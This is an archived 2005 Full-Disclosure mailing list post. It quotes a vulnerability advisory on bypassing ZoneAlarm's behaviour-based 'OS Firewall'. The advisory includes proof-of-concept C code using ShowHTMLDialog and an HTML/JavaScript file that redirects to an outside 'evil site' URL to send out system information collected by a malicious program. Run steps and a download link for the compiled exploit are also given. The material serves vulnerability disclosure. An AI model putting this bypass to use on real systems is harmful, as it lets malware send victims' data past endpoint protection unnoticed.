| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue Nov 8 18:28:54 2005
From: gautam.bipin at gmail.com (Bipin Gautam)
Subject: Zone Labs Products Advance Program Control and
OS Firewall (Behavioral Based) Technology Bypass Vulnerability
Debasis,
i'll see the POC; but seems like finally you did it... after our last
discussion i was trying to kick some nasm code to do the same. good
finding!@
On 11/8/05, Debasis Mohanty <mail@...kingspirits.com> wrote:
> Zone Labs Products Advance Program Control and OS Firewall (Behavioral
> Based) Technology Bypass Vulnerability
>
>
> I. PRODUCT BACKGROUND
> ZoneAlarm Pro and Internet Security Suite with its a new level of protection
> is what Zone Labs calls an "OS Firewall" based on "Behavior Based Analysis"
> has gone beyond network level protection and protects PCs against various
> local attacks on a windows machine. Currently available personal firewalls
> protects PCs against only network based attacks however the new Zone Labs
> "OS firewall" technology monitors activity at the kernel-level and prevents
> attacks at various level. The new approach alerts the user by closely
> monitoring at kernel level for any unusual activity in the system; like
> changes in critical registry keys, changes in start-up entries, any kind of
> Interprocess interactions and processes making outbound connections via
> other trusted programs. When ZoneAlarm sees unusual activity between
> applications, it can put the kibosh on memory being read, or quash
> unauthorized driver and service loading. The PoC below discusses how the
> ZoneAlarm Advance Program Control and Behavior Based Technology can be
> defeated by using HTML Modal Dialog Box.
>
> II. TECHNICAL DESCRIPTION
> Zone Alarm products with Advance Program Control or OS Firewall Technology
> enabled, detects and blocks almost all those APIs (like Shell,
> ShellExecuteEx, SetWindowText, SetDlgItem etc) which are commonly used by
> malicious programs to send data via http by piggybacking over other trusted
> programs. However, it is still possible for a malicious program (Trojans or
> worms etc) to make outbound connections to the evil site by piggybacking
> over trusted Internet browser using "HTML Modal Dialog" in conjunction with
> simple "JavaScript". Here it is assumed that the default browser (IE or
> Firefox etc) has authorization to access internet. In case of the default
> installation of ZoneAlarm Pro, IE is by default allowed to access internet.
> The PoC (Proof-of-Concept) in Section V explains the hack and the exploit
> code is also included for reference.
>
> III. IMPACT
> On successful exploitation the malicious program will be able to send the
> victim's details and personal system information to the attacker and this
> can further leads to complete system compromise.
>
> IV. AFFECTED PRODUCTS
> Zone Alarm Pro 6.0.x
> Zone Alarm Internet Security Suit 6.0.x
> Zone Alarm Firewall with Anti-Spyware 6.1.x
> Zone Alarm Firewall with Anti-Virus 6.0.x
> Zone Alarm Firewall (Free Version) 6.0.x
>
>
> V. PROOF-OF-CONCEPT:
> By using ShowHTMLDialog() method, it is possible for any malicious program
> to creates a modal dialog box that displays HTML. This in turn can be used
> to redirect the page to the attacker's site. It is observed that using this
> method, ZA Pro and Internet Security Suit is unable to block internet
> access. This method can be used by any malicious program to send data
> outside via http to the attacker and at the same time it can also receive
> the command instructions from the attacker. The detailed exploit code is
> given below:
>
> <<< osfwbypass-demo.c >>>
>
> BOOL LoadHtmlDialog(void)
> {
> HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL"));
>
> if (hinstMSHTML)
> {
> SHOWHTMLDIALOGFN* pfnShowHTMLDialog;
>
> // Open a Modal Dialog box of HTML content type
> pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML,
> TEXT("ShowHTMLDialog"));
>
> if (pfnShowHTMLDialog)
> {
> IMoniker *pURLMoniker;
>
> // Invoke the html file containing the data to be sent via http
> BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm");
> CreateURLMoniker(NULL, bstrURL, &pURLMoniker);
>
> if (pURLMoniker)
> {
> (*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
> pURLMoniker->Release();
> }
>
> SysFreeString(bstrURL);
> }
>
> FreeLibrary(hinstMSHTML);
> }
>
> Return True;
> }
>
> <<< +++ >>>
>
>
> <<< modal-dialog.htm >>>
> <html>
> <head>
> <meta http-equiv="Content-Language" content="en-us">
> <title>Redirection Dialog</title>
>
> <script language="JavaScript">
>
> <!-- Here goes the information logged by the malicious program which will
> be sent to the evil site via http request -->
> var sTargetURL =
> "http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[Your
> Information Here]
> window.location.href = sTargetURL;
> window.close;
> </script>
>
> </head>
> </html>
> <<< +++ >>>
>
> VI. DEMONSTRATION:
> For a live demonstration, the compiled binary ("osfwbypass-demo.exe") and
> the html redirection script ("modal-dialog.htm") has been enclosed with this
> advisory. To test, kindly follow the following steps:
>
> a. Extract both "osfwbypass-demo.exe" and "modal-dialog.htm" to "C:\".
> [Note: You can extract "osfwbypass-demo.exe" to whatever location you like
> but don't change the location of "modal-dialog.htm" other than "C:\"
> otherwise the PoC won't work.] -> Just to save time, I had to hardcode the
> path.
>
> b. Run "osfwbypass-demo.exe" and click on the "GO" button. This will
> open "modal-dialog.htm" in modal dialog box which further will redirect to
> the evil site and send the sample user info via the url to the evil site.
>
> c. First close "osfwbypass-demo.exe" before closing the modal dialog
> box otherwise the program might fail. Ya Ya I know.. I didn't put much
> effort for those try{} <=> catch{} ;-). Just wrote a quick demo and didn't
> hade much time for those tweaks.
>
>
> VII. CONCLUSION:
> This exploit might work for all other personal firewalls available which are
> based on behavioral based analysis. I didn't considered this test for
> ordinary personal firewall which does only network based protection as it is
> beyond the capability of those firewalls to protect against such attack
> although, this exploit will successfully bypass those firewalls.
>
>
>
> VIII. HISTORY:
> 10th Oct, 2005 - Bug Originally Discovered
>
> 15th Oct, 2005 - Vendor Reported
>
> 15th Oct, 2005 - Vendor acknowledged the report and asked me not go
> public until such time that they can fully investigate and coordinate a
> response.
>
> 17th Oct, 2005 - Vendor asked for more information
>
> 19th Oct, 2005 - Vendor provided with more information and the
> version info on which the exploit was tested.
>
> 21st Oct, 2005 - Vendor coordinator replied that he is leaving Zone
> Labs and there will be someone else who will get in touch with me.
>
> 21st Oct, 2005 - Vendor coordinator replied that he is leaving Zone
> Labs and there will be someone else who will get in touch with me.
>
> 29th Oct, 2005 - Final follow up with the vendor but no response
> after the first vendor coordinator left the organization. Don't know what
> the problem is??
>
> 8th Nov, 2005 -- Public Disclosure
>
>
> The PoC along with the compiled exploit can be download from the following
> link:
> http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html
>
>
> IX. CREDITS:
> Tr0y (a.k.a Debasis Mohanty)
> debasis@...kingspirits.com
> http://www.hackingspirits.com
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
Bipin Gautam
http://bipin.tk
Zeroth law of security: The possibility of poking a system from lower
privilege is zero unless & until there is possibility of direct,
indirect or consequential communication between the two...
Powered by blists - more mailing lists